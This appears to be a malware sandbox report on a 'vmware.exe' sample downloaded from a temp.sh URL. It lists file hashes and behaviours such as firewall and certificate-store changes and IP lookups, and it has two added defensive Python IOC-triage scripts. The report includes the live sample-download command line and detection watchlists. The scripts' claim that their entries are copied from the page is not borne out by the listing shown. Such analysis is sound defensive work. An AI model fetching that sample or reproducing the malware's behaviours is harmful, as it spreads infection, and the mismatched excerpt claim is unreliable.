C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\component_crx_cache\oimompecagnajdejgnnjijobebaeigek_1.2903aec9f77378fa19280af8ff89294fb9ce2caf8e0092c69e19973c0a9cc6fe

MD5 5d9ad58399fbef9be94190d149c2f863
SHA1 45f3674f0425d58d9ffc5d9001ff6754f357543c
SHA256 2903aec9f77378fa19280af8ff89294fb9ce2caf8e0092c69e19973c0a9cc6fe
SHA512 9a9532cce2de086d5934235d21d27b8a0863ae902a81151a728364aebe044faef5e5805d64efe68d67a5a5aaf408f74954d08f10c6a011dc9ea82c629339d3b0

C:\Users\Admin\AppData\Local\Temp\yandex_browser_updater.log

MD5 601685d81571fff1d73605c5bc55c12a
SHA1 bc3de3f0ee16cf9e234beb9f3854b9e916e09119
SHA256 f55d095763d065704f831ef4b8c133a08c8cbaaaeffffba1f22b19fa2cfe9423
SHA512 ae133f31754b385c1f039f9dd01f135175fca7f84b5bd878c7ab440bf9c40767ce28b36d4bc902f013a4e62a9e4a1dd52cf2b8866215285e9cc8a3b6579ca3ac

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\c3a0c2b0-1ec7-4aaf-86b3-70a488747f10.tmp

MD5 afd7f7a1c33ce199390263e45060412d
SHA1 3d955664cf0cd9ee3cf8ddbb107317871e0f19fd
SHA256 623765a24305d90d897e7ab862eae5bcfd9c0e7f1143d1884f57303de2ea5e00
SHA512 9d397f7a45310994e0204102855a5a329fb81ed26090951511da34c65015edc3b7752591d15b04e46d62172cb86b6b60fddfd994aba35b643493419719bd777b

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad\settings.dat

MD5 af643bc376c82e32fe92c738a1037e5d
SHA1 ed1bfe05f318e89e034af03414761d2bb05e0472
SHA256 d3302853d3d797090e3bad57608258a54514363df00bd77b0c46243c4631797b
SHA512 52bfdffa512db4d6b8b3ed9677b89cc8857530ff759149d7c42e33f490266500aff9f968a33a104168855fd525447af942b16f47de7bc84e406e81c84da48333

C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 72040e9e6e9fdcd3a5cd8bef97ef60c1
SHA1 770320d890c72aa4a9a1aa68ad416317bfbe301c
SHA256 85b37120f2bac3b0abdef967774fc4b63b4c02b885afb9e261ca5f4e93d5807e
SHA512 8d33d3355495413769a90b4eff48fdd75a458f07d6f76c23a7548de90480e34232ce59c33462dd08765b3d0f8a76327ed0cc11e3963d2595427dc46bda48a693
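
The listing above is the report's dropped-file inventory in a flat layout: a path, a blank line, then one line per digest (MD5, SHA1, SHA256, SHA512), with memory dumps listed by name only. The script below is an added example, not the sandbox vendor's code, that turns that layout into usable IOCs: it parses the block, validates digest lengths, separates memory dumps from files, flags PE files written to user-writable locations, and exposes a SHA256 set you can check local files against. The embedded listing is a constructed excerpt (four entries and one dump copied verbatim from the page); the user-writable markers and the `.exe`/`.dll` suffix test are assumptions of this example.

```python
import hashlib
import re
from dataclasses import dataclass, field
from pathlib import PureWindowsPath

# Constructed excerpt of the report's "Files" listing (copied from the page above);
# format: path line, blank line, one digest per line, blank line.
SAMPLE_LISTING = r"""
C:\Users\Admin\AppData\Local\Temp\vendor00000.xml

MD5 a96e6071a17b74bbd309bf696496b8f7
SHA1 63c1ecf860504d390b6f3a32982ddd8946b042c5
SHA256 1a855972dc308e47d30d567e1b37fdad349bf555b971bc14ead76e17a8accccc
SHA512 2c906e2f11d62d1336be482cc5ff784bf372cc7afb3263754e7810a1ae27e253aa9e22463456b62a25049d33ba1e69f129ed7e0a0273fe928dcaa216b7876449

C:\Users\Admin\AppData\Roaming\.minecraft\java\jre1.8.0_251\bin\javaw.exe

MD5 122e34bfa3146ef9ae5a51fdc744353f
SHA1 f0cc2294fe150a4cceca8a3da8615edcc4eb20e4
SHA256 dd2169db3358ccdf4a4a185e4a22955c989eaa3b9d3e0e6025599b8fa173c968
SHA512 306341e00598f02a70d3edc6ef666cb64982f1e31e5c0a1304977a1700c95395c1c7f0857ae8056853370eced0bd2aeafc72da804a65f98c1422929b7c431700

memory/348-2066-0x0000000000140000-0x0000000000141000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{E1B355E0-236E-4E8A-B095-A16158FF3343}.exe

MD5 bf2e1399a1e08ae36658b0aaa7fd5a99
SHA1 4d233713a23a77309a9470e13ae82c2a83cd8ae8
SHA256 c816c0bc31ab41c33f58bc4d3fbabd32bb4e06c7a0044d21a5e626f6bbfb9809
SHA512 8cbd230ebefbbd8a12780b60dff83a8543369e851ffc97fa2d5480432e69247eda671ba01a1200dd0adeae4aeb2518322e0564852a599f2c871aa440c0ee192c

C:\Windows\Temp\sdwra_5632_436080900\service_update.exe

MD5 7d5dcc6514ef69ab179e6744f853a78a
SHA1 0a7d0ea8fe4234ffd7cca24eb7fb93ad8f045474
SHA256 e80f1cb535a94fdd48bcc06e9b839c2ef831b1ea5f559ecd44bd67efc2a35985
SHA512 0e5eed3976624f207fc85217e60270bf28381a70291b46f7ce2a21c26430aa9e4010f66798b334e4a19cf2aacf5558089612e43edc2a27ba55bcf1e9fbab55a3
"""

HASH_LENGTHS = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
HASH_LINE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
MEMORY_DUMP = re.compile(r"^memory/\d+-\d+-0x[0-9a-fA-F]+-0x[0-9a-fA-F]+-memory\.dmp$")
# Assumed markers for locations a standard user can write to.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\public\\")


@dataclass
class FileEntry:
    path: str
    hashes: dict = field(default_factory=dict)

    @property
    def is_pe(self) -> bool:
        return PureWindowsPath(self.path).suffix.lower() in {".exe", ".dll"}

    @property
    def in_user_writable(self) -> bool:
        return any(marker in self.path.lower() for marker in USER_WRITABLE)


def parse_listing(text: str):
    """Return (file entries, memory-dump names) from the report's flattened listing."""
    entries, dumps, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = HASH_LINE.match(line)
        if m:
            if current is None:
                raise ValueError(f"hash line before any path: {line}")
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LENGTHS[algo]:
                raise ValueError(f"{algo} digest has wrong length for {current.path}")
            current.hashes[algo] = digest
        elif MEMORY_DUMP.match(line):
            dumps.append(line)  # memory dumps carry no digests in this listing
            current = None
        else:
            current = FileEntry(path=line)
            entries.append(current)
    return entries, dumps


def hash_set(entries, algo="SHA256"):
    return {e.hashes[algo] for e in entries if algo in e.hashes}


def dropped_executables(entries):
    """PE files written somewhere a standard user can write: the first things to triage."""
    return [e for e in entries if e.is_pe and e.in_user_writable]


def sha256_of_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_of_file(path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def is_known_artifact(data: bytes, known: set) -> bool:
    return sha256_of_bytes(data) in known


if __name__ == "__main__":
    entries, dumps = parse_listing(SAMPLE_LISTING)
    print(f"{len(entries)} files, {len(dumps)} memory dumps")
    for e in dropped_executables(entries):
        print("dropped PE:", e.path, e.hashes["SHA256"])
```

Exact-hash matching only catches byte-identical files, and many entries in this listing (the bundled JRE under `.minecraft\java`, the Yandex Browser installer tree, the Firefox and Opera profile backups) appear to be legitimate components touched during the run, so treat the resulting set as scoping data for a host check rather than a blocklist, and start with the PE files the `dropped_executables` filter returns.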

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-23 21:54

Reported

2024-06-23 21:57

Platform

win10v2004-20240508-en

Max time kernel

28s

Max time network

150s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" https://temp.sh/WwJqO/vmware.exe

Signatures

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\KLSetup.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e58503e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e58503e.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
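
The signature tables above are flattened into "Description Indicator Process Target" rows, and several of the most interesting ones (netsh.exe, icacls.exe) show only a process with an `N/A` indicator, so the command line has to be recovered from the Processes section before the firewall or ACL change can be judged. The script below is an added triage example, not part of the sandbox report, that parses rows in this layout and applies four checks: a process executing from a user-writable path (the Geo\Nation lookups come from `\AppData\Local\Temp` and the IE INetCache folder), a living-off-the-land binary with no indicator recorded, a lookup of a public IP-echo service, and a sweep of many drive letters by one process. The sample rows are a constructed excerpt copied from the tables above; the LOLBin set, the IP-service watchlist beyond ip-api.com, the user-writable markers and the drive-sweep threshold are assumptions of this example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed excerpt: rows copied from the behavioral2 signature tables above,
# in the page's flattened "Description Indicator Process Target" layout.
SAMPLE_ROWS = r"""
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\WTLDR.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\VVOFDIUO\vmware.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
N/A ip-api.com N/A N/A
File created C:\Windows\Installer\e58503e.msi C:\Windows\system32\msiexec.exe N/A
"""

# Description strings seen in the report's tables; matched as a leading prefix.
DESCRIPTIONS = (
    "File opened for modification", "File opened (read-only)", "File created",
    "Key value queried", "Key created", "Set value (str)", "Set value (int)",
    "Set value (data)", "N/A",
)
# After the description: indicator (may contain spaces), then a process path or N/A, then target.
REST = re.compile(
    r"^(?P<indicator>.+?) (?P<process>N/A|[A-Za-z]:\\.+?\.exe) (?P<target>N/A|.+)$",
    re.IGNORECASE,
)
# Assumptions of this example: user-writable markers, LOLBins of interest, IP-echo watchlist.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\inetcache\\", "\\programdata\\", "\\public\\")
LOLBINS = {"netsh.exe", "icacls.exe", "msiexec.exe"}
IP_LOOKUP_SERVICES = {"ip-api.com", "api.ipify.org", "ifconfig.me", "icanhazip.com"}
DRIVE_LETTER = re.compile(r"^\\\?\?\\[A-Z]:$")


@dataclass(frozen=True)
class SignatureRow:
    description: str
    indicator: str
    process: str
    target: str


def parse_row(line: str) -> SignatureRow:
    for desc in DESCRIPTIONS:
        if line.startswith(desc + " "):
            m = REST.match(line[len(desc) + 1:])
            if not m:
                raise ValueError(f"unparseable row: {line}")
            return SignatureRow(desc, m["indicator"], m["process"], m["target"])
    raise ValueError(f"unknown description in row: {line}")


def parse_rows(text: str):
    return [parse_row(l.strip()) for l in text.splitlines() if l.strip()]


def triage(rows, drive_sweep_threshold: int = 8):
    """Return (finding, process, detail) tuples; drive letters are counted per process."""
    findings, drives = [], defaultdict(set)
    for r in rows:
        if r.process != "N/A":
            if any(m in r.process.lower() for m in USER_WRITABLE):
                findings.append(("exec-from-user-writable", r.process, r.indicator))
            # A LOLBin with no indicator: pull its command line from the Processes section.
            if PureWindowsPath(r.process).name.lower() in LOLBINS and r.indicator == "N/A":
                findings.append(("lolbin-needs-cmdline", r.process, ""))
        if r.indicator.lower() in IP_LOOKUP_SERVICES:
            findings.append(("external-ip-lookup", r.process, r.indicator))
        if DRIVE_LETTER.match(r.indicator):
            drives[r.process].add(r.indicator[-2])
    for proc, letters in drives.items():
        if len(letters) >= drive_sweep_threshold:
            findings.append(("drive-sweep", proc, "".join(sorted(letters))))
    return findings


if __name__ == "__main__":
    for finding in triage(parse_rows(SAMPLE_ROWS)):
        print(*finding)
```

The drive-sweep check is the weakest of the four: Windows Installer commonly probes drive letters while resolving install sources, so msiexec.exe opening A: through Z: is expected installer behaviour and only worth attention when the sweeping process is something that should not be enumerating volumes. The `exec-from-user-writable` and `lolbin-needs-cmdline` findings are the ones to follow up first, starting with the netsh.exe and icacls.exe command lines.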

Enumerates physical storage devices

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = ac0790237ba1da01 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\RepId C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\RepId\PublicId = "{94F46ECB-70E4-4A9D-833B-45BE09247A4E}" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{3FDB9D79-31AB-11EF-B8C0-D64620966489} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 0400000001000000100000001bfe69d191b71933a372a80fe155e5b50f000000010000003000000066b764a96581128168cf208e374dda479d54e311f32457f4aee0dbd2a6c8d171d531289e1cd22bfdbbd4cfd979625483090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000e793c9b02fd8aa13e21c31228accb08119643b749c898964b1746d46c3d4cbd21400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb1d0000000100000010000000885010358d29a38f059b028559c95f900b00000001000000100000005300650063007400690067006f0000000300000001000000140000002b8f1b57330dbba2d07a6c51f70ee90ddab9ad8e190000000100000010000000ea6089055218053dd01e37e1d806eedf2000000001000000e2050000308205de308203c6a003020102021001fd6d30fca3ca51a81bbc640e35032d300d06092a864886f70d01010c0500308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f72697479301e170d3130303230313030303030305a170d3338303131383233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a
93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a3423040301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff300d06092a864886f70d01010c050003820201005cd47c0dcff7017d4199650c73c5529fcbf8cf99067f1bda43159f9e0255579614f1523c27879428ed1f3a0137a276fc5350c0849bc66b4eba8c214fa28e556291f36915d8bc88e3c4aa0bfdefa8e94b552a06206d55782919ee5f305c4b241155ff249a6e5e2a2bee0b4d9f7ff70138941495430709fb60a9ee1cab128ca09a5ea7986a596d8b3f08fbc8d145af18156490120f73282ec5e2244efc58ecf0f445fe22b3eb2f8ed2d9456105c1976fa876728f8b8c36afbf0d05ce718de6a66f1f6ca67162c5d8d083720cf16711890c9c134c7234dfbcd571dfaa71dde1b96c8c3c125d65dabd5712b6436bffe5de4d661151cf99aeec17b6e871918cde49fedd3571a21527941ccf61e326bb6fa36725215de6dd1d0b2e681b3b82afec836785d4985174b1b9998089ff7f78195c794a602e9240ae4c372a2cc9c762c80e5df7365bcae0252501b4dd1a079c77003fd0dcd5ec3dd4fabb3fcc85d66f7fa92ddfb902f7f5979ab535dac367b0874aa9289e238eff5c276be1b04ff307ee002ed45987cb524195eaf447d7ee6441557c8d590295dd629dc2b9ee5a287484a59bb790c70c07dff589367432d628c1b0b00be09c4cc31cd6fce369b54746812fa282abd3634470c48dff2d33baad8f7bb57088ae3
e19cf4028d8fcc890bb5d9922f552e658c51f883143ee881dd7c68e3c436a1da718de7d3d16f162f9ca90a8fd C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = … C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\4EFC31460C619ECAE59C1BCE2C008036D94C84B8\Blob = 0f0000000100000030000000c130bba37b8b350e89fd5ed76b4f78777feee220d3b9e729042bef6af46e8e4c1b252e32b3080c681bc9a8a1afdd0a3c0b000000010000004200000047006c006f00620061006c005300690067006e00200043006f006400650020005300690067006e0069006e006700200052006f006f007400200052003400350000006200000001000000200000007b9d553e1c92cb6e8803e137f4f287d4363757f5d44b37d52f9fca22fb97df8653000000010000001f000000301d301b060567810c010330123010060a2b0601040182373c0101030200c01400000001000000140000001f00bf46800afc7839b7a5b443d95650bbce963b1d00000001000000100000005467b0adde8d858e30ee517b1a19ecd909000000010000000c000000300a06082b060105050703030300000001000000140000004efc31460c619ecae59c1bce2c008036d94c84b8200000000100000076050000308205723082035aa00302010202107653feac75464893f5e5d74a483a4ef8300d06092a864886f70d01010c05003053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f7420523435301e170d3230303331383030303030305a170d3435303331383030303030305a3053310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613129302706035504031320476c6f62616c5369676e20436f6465205369676e696e6720526f6f742052343530820222300d06092a864886f70d01010105000382020f003082020a0282020100b62dc530dd7ae8ab903d0372b03a4b991661b2e5ffa5671d371ce57eec9383aa84f5a3439b98458ab863575d9b00880425e9f868924b82d84bc94a03f3a87f6a8f8a6127bda144d0fdf53f22c2a34f918db305b22882915dfb5988050b9706c298f82ca73324ee503a41ccf0a0b07b1d4dd2a8583896e9dff91b91bb8b102cd2c7431da20974a180af7be6330a0c596b8ebcf4ab5a977b7fae55fb84f080fe844cd7e2babdc475a16fbd61107444b29807e274abff68dc6c263ee91fe5e00487ad30d30c8d037c55b816705c24782025eb676788abba4e34986b7011de38cad4bea1c09ce1df1e0201d83be1674384b6cffc74b72f84a3bfba09373d676cb1455c1961ab4183f5ac1deb770d464773cebfbd9595ed9d2b8810fefa58e8a757e1b3cfa85ae9072
59b12c49e80723d93dc8c94df3b44e62680fcd2c303f08c0cd245d62ee78f989ee604ee426e677e42167162e704f960c664a1b69c81214e2bc66d689486c699747367317a91f2d48c796e7ca6bb7e466f4dc585122bcf9a224408a88537ce07615706171224c0c43173a1983557477e103a45d92da4519098a9a00737c4651aaa1c6b1677f7a797ec3f1930996f31fbea40b2e7d2c4fac9d0f050767459fa8d6d1732bef8e97e03f4e787759ad44a912c850313022b4280f2896a36cfc84ca0ce9ef8cb8dad16a7d3ded59b18a7c6923af18263f12e0e2464df0203010001a3423040300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e041604141f00bf46800afc7839b7a5b443d95650bbce963b300d06092a864886f70d01010c050003820201005e2bba749734445f764828408493ee016ee9a1b3d68025e67be4bc09913d0ffc76add7d43020bb8f60d091d61cf29cef781a2b943202c12496525202d0f3d1fcf29b396e99e11f8e43417d9a1e5bc95d9a84fc26e687f3747226ada41bd93d3b6a52a03c091e2f1e7bb333b445c7f7acb1af9360ad76aeb8b21578eb836aebffdb46ab24e5ee02fa901f59c02f5dd6b75da45c10b77253f8414eccfa781a254acafe85624361c3b437aa81d2f4d63a0fbd8d597e3047de2b6be72150335fd4679bd4b8679f3c279903ff85438e7312ca20cde861d5b166dc17d6396d0fdbcf2337a182894e1c6b3fd6a0cdaa079d3e4226aad70ceefa47bf1a527ed17581d3c98a62176d4f88a021a0263eaf6dd962301fe99828ae6e8dd58e4c726693808d2ae355c760679042565c22510fb3dc4e39ee4dddd91d7810543b6ed0976f03b51eb22373c612b29a64d0fc958524a8ffdfa1b0dc9140aedf0933abb9dd92b7f1cc91743b69eb67971b90bfe7c7a06f71bb57bfb78f5aed7a406a16cd80842d2fe102d4249443b315fc0c2b1bfd716ffccbbc75173a5e83d2c9b32f1bd59c8d7f54fe7e7ee456a387a79de1595294418f6d5bbe86959aff1a76dd40d2514a70b41f336323773fec271e59e40887ed34824a0f3ffea01dc1f56773458678f4aa29e92787c619dbc61314c33949874da097e06513f59d7756e9dab358c73af2c0cd82 C:\Users\Admin\AppData\Local\Temp\yadl.exe N/A
